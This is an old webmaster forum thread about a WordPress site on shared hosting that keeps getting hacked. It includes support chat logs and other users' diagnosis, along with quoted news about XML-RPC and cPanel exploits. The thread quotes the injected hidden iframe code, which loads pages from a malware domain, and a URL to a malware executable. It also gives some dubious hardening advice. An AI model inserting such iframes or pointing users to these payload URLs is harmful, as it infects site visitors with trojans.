Responce (part 2 of): I keep getting hacked...
 

This is in continuation from my orginal post:
http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked-2.html

I had to end up deleting everything from the server and reinstall, but again I was ONLY running WP.

So I decide to turn off my computers, shut everything down, and take a little trip: I went to my house in Arizona for the weekend, I come back and It is hacked again.

This time I have different code embeded at the top:
http://i111.photobucket.com/albums/n...tbaron00/1.gif

Here is the first conversation:
Monday, October 02, 2006 5:19:24 PM (10/2/2006 9:19:24 PM - GMT)

Powered by SightMax.

Welcome to Webair, Alex will be right with you.

Alex:
hello ,how may i hel pyou?

Rob:
yeah I need a lot of help.

Rob:
my website has been comprimised and I was wondering if you could assist me in finding a soultion?

Alex:
what site?

Rob:
www.howgay.com

Alex:
in what way was it compromised?

Alex:
is there a ticket # on this?

Rob:
no ticket number, every day or other day.....code is being inserted into the header portion. its a trojan.

Rob:
the code in there at the moment is

Rob:
:

Rob:
<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Rob:
I was told ::

Rob:
Here's a little suggestion to see what is running in the background: I'm pressuming this malicious script is being called by a cron job so log in by ssh with your root password and type in crontab -l See what is running in the background

Rob:
because i have a rootkit on the server?

Alex:
i l lcheck cron

Rob:
anything

Rob:
?

Alex:
sorry still working on it

Rob:
oh cool, I dont mean to bother you. sorry

Rob:
?

Alex:
almost done checking

Rob:
okay cool thanks again

Alex:
thereis no crontabls for that user

Alex:
we suggest upgrading all the scripts to the latest version which is most probably the reason of compromises

Rob:
i only run wordpress

Rob:
its the most up to date one

Alex:
<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Alex:
whereis the code ?

Rob:
on the very top

Rob:
of the index page

Alex:
a senior tech will be able to take a look at thi issue in 5-10 minutes.

Alex:
please dont remove it

Alex:
keep the page as it is

Rob:
okay, how will i get an update?

Alex:
i will create a ticket on this on your behalf and you ll get an email

Rob:
okay

Rob:
cool

Rob:
so ill just sit tight

Rob:
have a good day

Visitor Rob has ended the chat

Then my second conversation after hours of no responce:
Adrian
Hi, how may i help?
RobV
yeah adrian, i was tlaking to you earlier about my hacked website.
Adrian
the exploit is not on our side
RobV
and is there any record of when it was changed? or anything?
Adrian
one moment
Adrian
where on the site does it show its hacked
RobV
on the main page
RobV
there is embeded code
RobV
and when you visit the site
RobV
it tries to load a trojan
Adrian
i believe the problem lies in your computer at home
Adrian
it might have gotten to the server through an upload
Adrian
trojans don't spread on virtual unix systems
RobV
i had my computers off all weekend for this specific reason
Adrian
i'm on a unix machine and when i pull up the site thats all i see, the site
Adrian
get some good antivirus software, i recommend an updated Norton Antivirus and completely download all the content and scan your computer

And thats where I sit, NOTHING NEW, NOTHING SOLVED.
and yes - I already have the most up to date Norton software, everything has been scanned and double checked. BUT MORE IMPORTANTLY - my "infected computer at home" wasn't on or I have not accessed my server SINCE everything was "fixed" Also it only happens to this site folder, my other domains and other sites are not infected (and yes I have been working on them and uploading), weird?

drama.....?

People were ICQing me and asking if the situation was solved. To sum up the above post: NO

I am still also working on this.. No one seems to have a much of a clue on how to totally clear this up...

PLEASE let me know if you find a fix and I will do the same..

THX

Is your copy of wordpress current? Do you run anything else on it? Is this a shared WebAir system?

It's pretty trivial for bad permissions or weak permissions to let people fuck with your stuff. When I was (shortly) with webair, shared7, the machine I was on, didn't use suexec/phpsuexec, so everyone ran on the webserver as the same PID.

It'd be really trivial for someone to execute find, steal your password info, modify or insert their own administrator password hash, and log into your WordPress. I estimate maybe three seconds with one single script that globs recursively.. if server7 isn't down every 10 seconds these days.

Most current WP
Webair shared.

Will do.

ehm...okay....

i can help you fix it, please ICQ me asap, 120594593

i saw this when i viewed the source of a page
http://megacount.net/adv/0/win32.exe

maybe that is the virus/backdoor

found here:
http://megacount.net/adv/new.php

did you check all the permissions on your WP files?
was your computer at home actually infected with anything?

Hmmm. The whole 'shared' bit has me concerned.

Try chmodding your public_html directory 771, or 751, then leave everything else as normal. See if it happens again (if it's a script on the server, '1' will let things execute and be read, but you won't be able to get a directory listing, so skr1pt kiddy hacks will fail.)

i may be able to code up a pascal program for you to resolve this issue

1cq 532-764-769

that could result in erasing the root folder if permissions on the box are set to 777 at a root level

As I noted above, when I was with WebAir, the apache server ran as a different user than my login.

So, if public_html = 771 robv:robv and apache runs at nobody, or www, it can read any subdirectories and files, just not stat to do a directory listing.

1 != 7

I dont understand why you would want to delete root

at least advise to back up if nothing else

ha ha no one ever wants to take responsibility for anything these days.

If I am doing something to cause this I would just like to be informed how to prevent it, and I would take responsibility.

The DNS for megacount.net points towards the domain game4all.biz. When you Google that domain you see a lot of people having issues with trojans/malware on their computers and having servers infected.

Some exploits are hard to track down, its could be as simple as a shell script disguised as an image, the one thing most of these exploits have in common is that they attack world writable files, not many files need to be world writable but some virtual hosting setups create lots of them due to the way the virtual accounts are managed

if you can ssh to your account, you can run

find /your/directory -perm +o=w -follow

and get a list of world writable files, Im betting the files that keep getting defaced are world writable

You can remove the world writable bit with this command

chmod o-w file.name

What the hell are you talking about? I've never said anything that even comes close to deleting files. Try reading the advice I gave.

why oh why would you rebuild the kernel?

If you don't have this fixed tommorow please icq me.

This one seems pretty interesting

http://www.castlecops.com/t137702-XM...ty_Attack.html

Why didn't your host offer to check Apache logs?????

You need to change hosts and install with a new host and see if you still have the same issue.

It seems like your FTP, SSH or telnet (disable it) password was compromised.

It has nothing to do with a compromised FTP, SSH or whatever password. Read this

"Hackers are launching attacks on popular PHP-based blogging, wiki and content management program that failed to patch a serious security hole discovered in July. The attacks exploit flaws in the way PHP libraries handle XML-RPC commands, and appear to be targeting installations of WordPress and Drupal.
If left unpatched, an attacker could compromise a web server through vulnerable programs including WordPress, Drupal, PostNuke, Serendipity, phpAdsNew and phpWiki, among others. These projects all issued fixes six months ago, as did the authors of the affected PHP libraries.
But as is often the case, some web servers and individual blogging applications remain unpatched. The Internet Storm Center has been receiving reports of attacks that install a remote access trojan through a weakness in the XML-RPC function in some PHP libraries, which allow applications to exchange XML data using remote procedure calls (RPC). XML-RPC has many uses in web applications, including "ping" update notifications for RSS feeds. The affected libraries, including PHPXMLRPC and Pear XML-RPC, are included in many interactive applications written in PHP.
The flaws may be of particular interest to phishing operations, which have recently been installing spoof pages through security holes in bulletin boards and content management apps. Updated copies of the affected PHP libraries are now available, and immediate upgrades are recommended."

:2 cents:

I dont know if this has any importance (esp how you were talking about the iframing) but I just wanted to add it......


HostGator: cPanel Security Hole Exploited in Mass Hack

HostGator says hackers compromised its servers using a previously unknown security hole in cPanel, the control panel software that is widely used by hosting providers. "I can tell you with all accuracy that this is definitely due to a cPanel exploit that provides root access and all cPanel servers are affected," said HostGator system administrator Tim Greer. "This issue affects all versions of cPanel, from what I can tell, from years ago to the current releases, including Stable, Release, Current and Edge."

cPanel has just released a fix. "Running /scripts/upcp will fix the vulnerability in all builds," cPanel said in a message on its user forums. "Please note that this is a local exploit which requires access to a cPanel account. ... If you believe you have been exploited through this vulnerability, you are welcome to submit a support request for assistance."

Hackers gained access to HostGator's servers late Thursday and began redirecting customer sites to outside web pages that exploit an unpatched VML security hole in Internet Explorer to infect web surfers with trojans. The existence of the new "0-day" exploit of cPanel leaves a large number of hosting companies vulnerable to similar attacks until they install the patch. The riusk is mitigated somewhat by the fact that it is a local exploit, meaning any attack on a host must be launched from an existing account with cPanel access.

HostGator site owners said iframe code inserted into their web pages was redirecting users to the malware-laden pages. Company staff made several efforts to reconfigure servers on Friday, only to have the exploits recur. Since the attacker controlled a cPanel account at HostGator, the exploit could be repeated after each cleanup of the malicious code. By early Saturday morning, HostGator managers were assuring users that the cause of the redirections had been isolated, and was due to a new exploit targeting cPanel.

bump. two of my wordpress blogs got hit with this shit

What host?

realitychecknetwork

it's all over the place as far as i can tell. i had to go through all my sites and find/delete that shit code. then i had to change all the permissions to read only. fucking sucked. it spread out of wordpress and on to regular PHP pages on sites with no scripts at all.

Yeah this isn't too fun.

i can say that once i deleted the iframe code and changed the permission, it hasn't come back. but it's not solely a wordpress problem. any file that has write access to it at all is vulnerable.

I think lots of people would be interested in that...

buuuuump just got hit AGAIN today